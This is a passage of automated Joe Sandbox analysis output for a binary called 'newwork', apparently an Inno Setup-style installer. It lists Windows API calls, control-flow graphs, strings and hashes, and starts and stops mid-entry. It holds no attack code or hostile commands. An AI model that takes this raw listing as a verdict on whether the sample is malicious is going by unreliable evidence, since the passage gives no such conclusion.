                                                                                          • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                        • API String ID: 3771764029-544719455
                                                                                        • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                        • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                        • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                        • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                        APIs
                                                                                          • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                        • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                        • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                        • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                        • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                        • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                        • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                        • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                        • String ID: |6B
                                                                                        • API String ID: 183575631-3009739247
                                                                                        • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                        • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                        • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                        • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                        • API String ID: 190572456-256906917
                                                                                        • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                        • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                        • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                        • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                        • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$Prop
                                                                                        • String ID: 3A$yA
                                                                                        • API String ID: 3887896539-3278460822
                                                                                        • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                        • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                        APIs
                                                                                        • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                          • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                        • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                        • String ID: c:\directory$shell32.dll$%H
                                                                                        • API String ID: 3376378930-166502273
                                                                                        • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                        • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F58F
                                                                                        • GetFocus.USER32 ref: 0042F597
                                                                                        • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                        • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                        • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                        • String ID: TWindowDisabler-Window
                                                                                        • API String ID: 3167913817-1824977358
                                                                                        • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                        • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                        • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                        APIs
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                        • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                        • API String ID: 4130936913-2943970505
                                                                                        • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                        • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                        • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                        • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                          • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                          • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                          • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                          • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                        • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                        • API String ID: 854858120-615399546
                                                                                        • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                        • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                        • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                        APIs
                                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                        • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                        • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                                        • String ID: 2$MAINICON
                                                                                        • API String ID: 3935243913-3181700818
                                                                                        • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                        • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                        • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                        • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                          • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                          • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                          • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                          • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                          • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                          • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                          • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                          • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                          • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                          • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                          • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                          • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
